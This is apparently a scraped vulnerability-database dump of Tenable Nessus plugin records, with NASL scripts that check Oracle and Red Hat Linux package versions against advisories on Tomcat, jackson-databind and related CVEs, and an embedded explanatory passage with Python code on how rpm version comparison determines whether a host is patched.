'release':'8'},\n {'reference':'glassfish-jaxb-runtime-2.2.11-11.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-jaxb-txw2-2.2.11-11.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-annotations-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-core-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-databind-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-jaxrs-json-provider-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-jaxrs-providers-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-module-jaxb-annotations-2.7.6-4.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jakarta-commons-httpclient-3.1-28.module+el8.0.0+3248+9d514f3b', 'release':'8', 'epoch':'1'},\n {'reference':'javassist-3.18.1-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'javassist-javadoc-3.18.1-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'pki-servlet-4.0-api-9.0.7-14.module+el8.0.0+3248+9d514f3b', 'release':'8', 'epoch':'1'},\n {'reference':'pki-servlet-container-9.0.7-14.module+el8.0.0+3248+9d514f3b', 'release':'8', 'epoch':'1'},\n {'reference':'python-nss-debugsource-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'aarch64', 'release':'8'},\n {'reference':'python-nss-debugsource-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'s390x', 'release':'8'},\n {'reference':'python-nss-debugsource-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'x86_64', 'release':'8'},\n {'reference':'python-nss-doc-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'aarch64', 'release':'8'},\n {'reference':'python-nss-doc-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'s390x', 'release':'8'},\n {'reference':'python-nss-doc-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'x86_64', 'release':'8'},\n {'reference':'python3-nss-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'aarch64', 
'release':'8'},\n {'reference':'python3-nss-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'s390x', 'release':'8'},\n {'reference':'python3-nss-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'x86_64', 'release':'8'},\n {'reference':'relaxngDatatype-2011.1-7.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'resteasy-3.0.26-3.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'slf4j-1.7.25-4.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'slf4j-jdk14-1.7.25-4.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'stax-ex-1.7.7-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'velocity-1.7-24.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xalan-j2-2.7.1-38.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xerces-j2-2.11.0-34.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xml-commons-apis-1.4.01-25.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xml-commons-resolver-1.2-26.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xmlstreambuffer-1.5.4-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xsom-0-19.20110809svn.module+el8.0.0+3248+9d514f3b', 'release':'8'}\n ],\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n if 
(!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apache-commons-collections / apache-commons-lang / bea-stax-api / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:15", "description": "From Red Hat Security Advisory 2019:1529 :\n\nAn update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental packages required as dependencies for the pki-core module by Red Hat Certificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : pki-deps:10.6 (ELSA-2019-1529)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-07-15T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:xmlstreambuffer", "p-cpe:/a:oracle:linux:xsom", "cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:apache-commons-collections", "p-cpe:/a:oracle:linux:apache-commons-lang", "p-cpe:/a:oracle:linux:bea-stax-api", "p-cpe:/a:oracle:linux:glassfish-fastinfoset", "p-cpe:/a:oracle:linux:glassfish-jaxb-api", "p-cpe:/a:oracle:linux:glassfish-jaxb-core", "p-cpe:/a:oracle:linux:glassfish-jaxb-runtime", "p-cpe:/a:oracle:linux:glassfish-jaxb-txw2", "p-cpe:/a:oracle:linux:jackson-annotations", "p-cpe:/a:oracle:linux:jackson-core", "p-cpe:/a:oracle:linux:jackson-databind", "p-cpe:/a:oracle:linux:jackson-jaxrs-json-provider", "p-cpe:/a:oracle:linux:jackson-jaxrs-providers", "p-cpe:/a:oracle:linux:jackson-module-jaxb-annotations", 
"p-cpe:/a:oracle:linux:jakarta-commons-httpclient", "p-cpe:/a:oracle:linux:javassist", "p-cpe:/a:oracle:linux:javassist-javadoc", "p-cpe:/a:oracle:linux:pki-servlet-4.0-api", "p-cpe:/a:oracle:linux:pki-servlet-container", "p-cpe:/a:oracle:linux:python-nss-doc", "p-cpe:/a:oracle:linux:python3-nss", "p-cpe:/a:oracle:linux:relaxngdatatype", "p-cpe:/a:oracle:linux:resteasy", "p-cpe:/a:oracle:linux:slf4j", "p-cpe:/a:oracle:linux:slf4j-jdk14", "p-cpe:/a:oracle:linux:stax-ex", "p-cpe:/a:oracle:linux:velocity", "p-cpe:/a:oracle:linux:xalan-j2", "p-cpe:/a:oracle:linux:xerces-j2", "p-cpe:/a:oracle:linux:xml-commons-apis", "p-cpe:/a:oracle:linux:xml-commons-resolver"], "id": "ORACLELINUX_ELSA-2019-1529.NASL", "href": "https://www.tenable.com/plugins/nessus/127594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:1529 and \n# Oracle Linux Security Advisory ELSA-2019-1529 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127594);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/15\");\n\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_xref(name:\"RHSA\", value:\"2019:1529\");\n\n script_name(english:\"Oracle Linux 8 : pki-deps:10.6 (ELSA-2019-1529)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2019:1529 :\n\nAn update for the pki-deps:10.6 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental\npackages required as dependencies for the pki-core module by Red Hat\nCertificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a mishandling of close in NIO/NIO2 connectors user\nsessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-August/008981.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected pki-deps:10.6 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bea-stax-api\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-fastinfoset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glassfish-jaxb-txw2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-jaxrs-providers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-httpclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:javassist-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pki-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pki-servlet-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-nss-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python3-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:relaxngDatatype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:slf4j\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:slf4j-jdk14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:stax-ex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:velocity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xalan-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xml-commons-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xml-commons-resolver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xmlstreambuffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xsom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.2-10.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"apache-commons-lang-2.6-21.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"bea-stax-api-1.2.0-16.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-fastinfoset-1.2.13-9.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", 
cpu:\"x86_64\", reference:\"glassfish-jaxb-api-2.2.12-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-jaxb-core-2.2.11-11.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-jaxb-runtime-2.2.11-11.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"glassfish-jaxb-txw2-2.2.11-11.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-annotations-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-core-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-databind-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-jaxrs-json-provider-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-jaxrs-providers-2.9.8-1.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jackson-module-jaxb-annotations-2.7.6-4.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"jakarta-commons-httpclient-3.1-28.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"javassist-3.18.1-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"javassist-javadoc-3.18.1-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"pki-servlet-4.0-api-9.0.7-14.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"pki-servlet-container-9.0.7-14.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", 
reference:\"python-nss-doc-1.0.1-10.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"python3-nss-1.0.1-10.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"relaxngDatatype-2011.1-7.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"resteasy-3.0.26-3.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"slf4j-1.7.25-4.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"slf4j-jdk14-1.7.25-4.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"stax-ex-1.7.7-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"velocity-1.7-24.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xalan-j2-2.7.1-38.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xerces-j2-2.11.0-34.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xml-commons-apis-1.4.01-25.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xml-commons-resolver-1.2-26.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xmlstreambuffer-1.5.4-8.module+el8.0.0+5231+3e842911\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"xsom-0-19.20110809svn.module+el8.0.0+5231+3e842911\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-lang / bea-stax-api / 
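The rpm_check() calls above decide "affected" by comparing the installed package's epoch, version and release against the fixed reference under rpm's own ordering, which is what makes module-stream releases such as `10.module+el8.0.0+5231+3e842911` comparable at all. The following is an added example, not Tenable's code and not part of the advisory: a Python port of rpm's rpmvercmp ordering plus a NEVR splitter, run against the fixed references quoted from the plugin. The installed package list is constructed for the example, and the module build tags after `+` in it are made up.

```python
import re
from typing import List, Tuple


def rpmvercmp(a: str, b: str) -> int:
    """rpm's ordering for a version or release string: 1 if a is newer, -1 if
    older, 0 if equal. Separators are skipped; digit runs compare numerically,
    letter runs lexically; digits beat letters; '~' sorts before anything,
    even end of string; '^' sorts after end of string but before anything else."""
    if a == b:
        return 0
    alnum = lambda c: c.isascii() and c.isalnum()
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not (alnum(a[i]) or a[i] in "~^"):
            i += 1
        while j < len(b) and not (alnum(b[j]) or b[j] in "~^"):
            j += 1
        ta, tb = i < len(a) and a[i] == "~", j < len(b) and b[j] == "~"
        if ta or tb:                       # tilde: pre-release marker
            if not ta:
                return 1
            if not tb:
                return -1
            i, j = i + 1, j + 1
            continue
        ca, cb = i < len(a) and a[i] == "^", j < len(b) and b[j] == "^"
        if ca or cb:                       # caret: post-release marker
            if i >= len(a):
                return -1
            if j >= len(b):
                return 1
            if not ca:
                return 1
            if not cb:
                return -1
            i, j = i + 1, j + 1
            continue
        if i >= len(a) or j >= len(b):
            break
        numeric = a[i].isdigit()
        pat = r"[0-9]+" if numeric else r"[A-Za-z]+"
        ma, mb = re.match(pat, a[i:]), re.match(pat, b[j:])
        if mb is None:                     # one side digits, the other letters
            return 1 if numeric else -1
        sa, sb = ma.group(0), mb.group(0)
        i, j = i + len(sa), j + len(sb)
        if numeric:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1        # whichever still has segments is newer


def parse_nevr(nevr: str) -> Tuple[str, str, str, str]:
    """Split 'name-[epoch:]version-release' (arch already stripped) into
    (name, epoch, version, release). Names may contain '-', so split from the right."""
    name_ver, _, release = nevr.rpartition("-")
    name, _, version = name_ver.rpartition("-")
    if not (name and version and release):
        raise ValueError(f"not name-version-release: {nevr!r}")
    epoch, _, version = version.rpartition(":")
    return name, epoch or "0", version, release


def is_vulnerable(installed: str, reference: str) -> bool:
    """True when the installed build is strictly older than the fixed one:
    epoch first, then version, then release, each under rpmvercmp."""
    n1, *evr1 = parse_nevr(installed)
    n2, *evr2 = parse_nevr(reference)
    if n1 != n2:
        raise ValueError(f"package names differ: {n1} vs {n2}")
    for x, y in zip(evr1, evr2):
        r = rpmvercmp(x, y)
        if r:
            return r < 0
    return False


def outdated_packages(installed: List[str], fixed: List[str]) -> List[str]:
    """Names from `fixed` whose installed build is older. Packages that are not
    installed are skipped, as the plugin's flag logic does."""
    present = {parse_nevr(p)[0]: p for p in installed}
    out = []
    for ref in fixed:
        name = parse_nevr(ref)[0]
        if name in present and is_vulnerable(present[name], ref):
            out.append(name)
    return out


# Fixed references copied from the ELSA-2019-1529 checks above.
FIXED = [
    "apache-commons-collections-3.2.2-10.module+el8.0.0+5231+3e842911",
    "jackson-databind-2.9.8-1.module+el8.0.0+5231+3e842911",
    "pki-servlet-container-9.0.7-14.module+el8.0.0+5231+3e842911",
]
# Constructed `rpm -qa` output for one host; the build tags after '+' are invented.
INSTALLED = [
    "apache-commons-collections-3.2.2-9.module+el8.0.0+4000+constructed",
    "jackson-databind-2.9.8-1.module+el8.0.0+5231+3e842911",
    "pki-servlet-container-9.0.7-14.module+el8.1.0+6000+constructed",
    "tomcat-9.0.30-1.constructed",
]

if __name__ == "__main__":
    print("older than the fixed build:", outdated_packages(INSTALLED, FIXED))
```

Feed it `rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'` output, putting `%{EPOCH}:` in front of the version for packages that carry one. Two caveats the plugin above also encodes: the comparison is only meaningful within the same module stream (the plugin audits out when `pki-deps:10.6` is not the enabled stream), and a release from a newer stream tag such as `el8.1.0` sorts above the reference even when its numeric prefix is equal, which is why the third constructed package is not reported.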
etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-06T15:09:13", "description": "The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and 13.4.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). 
Supported versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Enterprise Manager Base Platform executes to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2019-0227", "CVE-2019-12415", "CVE-2020-2982", "CVE-2020-9546"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/138555", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138555);\n script_version(\"1.15\");\n 